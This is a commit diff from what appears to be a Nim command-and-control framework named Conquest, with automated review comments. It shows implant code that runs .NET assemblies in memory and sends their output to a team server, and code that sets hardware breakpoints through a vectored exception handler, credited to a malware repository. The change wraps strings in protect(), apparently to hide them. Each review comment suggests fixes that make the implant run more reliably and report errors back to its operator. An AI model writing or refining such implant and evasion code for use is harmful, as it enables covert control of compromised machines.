Fixed issue that caused assembly execution to fail when used more than once in a session.
@@ -56,26 +56,39 @@ proc dotnetInlineExecuteGetOutput*(assemblyBytes: seq[byte], arguments: seq[stri
# For the actual assembly execution, the winim/[clr] library takes care of most of the heavy lifting for us here
# - https://github.com/khchen/winim/blob/master/winim/clr.nim
var assembly = load(assemblyBytes)
var mscorlib = load(protect("mscorlib"))
# Create AppDomain
let appDomainType = mscorlib.GetType(protect("System.AppDomain"))
let domainSetup = mscorlib.new(protect("System.AppDomainSetup"))
domainSetup.ApplicationBase = getCurrentDir()
domainSetup.DisallowBindingRedirects = false
domainSetup.DisallowCodeDownload = true
domainSetup.ShadowCopyFiles = protect("false")
let domain = @appDomainType.CreateDomain(protect("AppDomain"), toCLRVariant(nil), domainSetup)
# Load assembly
let assemblyType = mscorlib.GetType("System.Reflection.Assembly")
let assembly = @assemblyType.Load(assemblyBytes.toCLRVariant(VT_UI1))
# Parsing the arguments to be passed to the assembly
var args = arguments.toCLRVariant(VT_BSTR)
# Redirect the output of the assembly to a .NET StringWriter so we can return it to the team server over the network
var
mscor = load(protect("mscorlib"))
io = load(protect("System.IO"))
Console = mscor.GetType(protect("System.Console"))
StringWriter = io.GetType(protect("System.IO.StringWriter"))
Console = mscorlib.GetType(protect("System.Console"))
StringWriter = mscorlib.GetType(protect("System.IO.StringWriter"))
var stringWriter = @StringWriter.new()
var oldConsole = @Console.Out
@Console.SetOut(stringWriter)
# Execute the assemblies entry point
# Execute the entry point of the assembly
assembly.EntryPoint.Invoke(nil, toCLRVariant([args]))
# Reset console properties
# Cleanup
@Console.SetOut(oldConsole)
@appDomainType.Unload(domain)
return (assembly, fromCLRVariant[string](stringWriter.ToString()))
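Review bot: The cleanup at `@Console.SetOut(oldConsole)` and `@appDomainType.Unload(domain)` only runs when `assembly.EntryPoint.Invoke` returns normally; if the invoked assembly or the COM call raises, stdout stays redirected into the StringWriter for the rest of the process and the AppDomain is never unloaded, which is the same "breaks on the second run" symptom this commit is addressing. Registering the cleanup at acquisition time makes it unconditional: `defer: @appDomainType.Unload(domain)` directly after the `CreateDomain` line, and `defer: @Console.SetOut(oldConsole)` directly after the first `@Console.SetOut(stringWriter)`. Separately, as far as the hunk shows, `@assemblyType.Load(...)` is a static `Assembly.Load(byte[])` executed in the calling (default) domain and nothing loads the bytes into `domain`, so the domain created and unloaded here may not actually contain the executed code and the unload would not release the assembly — worth confirming against the winim/clr semantics. `mscorlib.GetType("System.Reflection.Assembly")` is also the one type-name literal in this block not wrapped in `protect(...)`, unlike its neighbours. The proc's signature and start are outside the hunk.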
@@ -1,4 +1,5 @@
import winim/lean
import ../../common/utils
# From: https://github.com/m4ul3r/malware/blob/main/nim/hardware_breakpoints/hardwarebreakpoints.nim
@@ -32,7 +33,7 @@ proc setHardwareBreakpoint*(pAddress: PVOID, fnHookFunc: PVOID, drx: DRX): bool
threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS
if GetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo "[!] GetThreadContext Failed: ", GetLastError()
echo protect("[!] GetThreadContext Failed: "), GetLastError()
return false
case drx:
@@ -58,7 +59,7 @@ proc setHardwareBreakpoint*(pAddress: PVOID, fnHookFunc: PVOID, drx: DRX): bool
threadCtx.Dr7 = setDr7Bits(threadCtx.Dr7, (cast[int](drx) * 2), 1, 1)
if SetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo "[!] SetThreadContext Failed", GetLastError()
echo protect("[!] SetThreadContext Failed: "), GetLastError()
return false
return true
@@ -68,7 +69,7 @@ proc removeHardwareBreakpoint*(drx: DRX): bool =
threadCtx.ContextFlags = CONTEXT_DEBUG_REGISTERS
if GetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo "[!] GetThreadContext Failed: ", GetLastError()
echo protect("[!] GetThreadContext Failed: "), GetLastError()
return false
# Remove the address of the hooked function from the thread context
@@ -86,7 +87,7 @@ proc removeHardwareBreakpoint*(drx: DRX): bool =
threadCtx.Dr7 = setDr7Bits(threadCtx.Dr7, (cast[int](drx) * 2), 1, 0)
if SetThreadContext(cast[HANDLE](-2), threadCtx.addr) == 0:
echo "[!] SetThreadContext Failed", GetLastError()
echo protect("[!] SetThreadContext Failed"), GetLastError()
return false
return true
@@ -195,7 +196,7 @@ proc initializeHardwareBPVariables*(): bool =
# Add 'VectorHandler' as the VEH
g_VectorHandler = AddVectoredExceptionHandler(1, cast[PVECTORED_EXCEPTION_HANDLER](vectorHandler))
if cast[int](g_VectorHandler) == 0:
echo "[!] AddVectoredExceptionHandler Failed"
echo protect("[!] AddVectoredExceptionHandler Failed")
return false
if (cast[int](g_VectorHandler) and cast[int](g_CriticalSection.DebugInfo)) != 0:
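Review bot: The replacement line `echo protect("[!] SetThreadContext Failed"), GetLastError()` in removeHardwareBreakpoint drops the `: ` separator that its sibling in setHardwareBreakpoint now carries, so the error code is printed glued to the text; it should read `echo protect("[!] SetThreadContext Failed: "), GetLastError()`. In all four rewritten echo lines `protect(...)` is evaluated before `GetLastError()`, and if `protect` performs any runtime decoding that allocates or otherwise touches Win32, it may clobber the last-error value — I cannot see `protect`'s implementation from here, so treat that as something to confirm, but reading it first with `let err = GetLastError()` right after the failing call is the safer order. Note also that the strings are only hidden at rest: `echo` still writes the decoded text to the agent's stdout at runtime, and the callers only receive `false`, so the error code never reaches the operator. Finally, `(cast[int](g_VectorHandler) and cast[int](g_CriticalSection.DebugInfo)) != 0` at the end of the hunk is a bitwise and of two pointer values, which reads like an intended non-nil check on both; its body lies outside the hunk, as do the starts of the enclosing procs.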
@@ -12,11 +12,9 @@ proc makeAgentLogDirectory*(cq: Conquest, agentId: string): bool =
return false
proc log*(cq: Conquest, logEntry: string) =
let
# TODO: Fix issue where log files are written to the wrong agent when the interact agent is changed in the middle of command execution
# Though that problem would not occur when a proper GUI is used in the future
date = now().format("dd-MM-yyyy")
agentLogPath = fmt"{CONQUEST_ROOT}/data/logs/{cq.interactAgent.agentId}/{date}.session.log"
# TODO: Fix issue where log files are written to the wrong agent when the interact agent is changed in the middle of command execution
# Though that problem would not occur when a proper GUI is used in the future
let agentLogPath = fmt"{CONQUEST_ROOT}/data/logs/{cq.interactAgent.agentId}/session.log"
# Write log entry to file
let file = open(agentLogPath, fmAppend)
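Review bot: `agentLogPath` interpolates `cq.interactAgent.agentId` straight into a filesystem path and hands it to `open(..., fmAppend)` with no validation; if agent IDs can originate from an agent check-in rather than being minted server-side, an ID containing `..` or a path separator would let a rogue agent steer the session log outside `{CONQUEST_ROOT}/data/logs` — worth confirming where the ID comes from, and cheap to guard regardless with something like `doAssert not agentId.contains({'/', '\\'}) and ".." notin agentId` next to the path construction. Dropping the `{date}.` prefix also means each agent's log now grows unbounded in a single file, a trade-off worth recording in a comment such as `# one session.log per agent; no rotation — rotate externally if needed`. `open` raises IOError if makeAgentLogDirectory has not run for this agent, and nothing visible in the hunk handles that or closes the file; the remainder of `log` is outside the hunk.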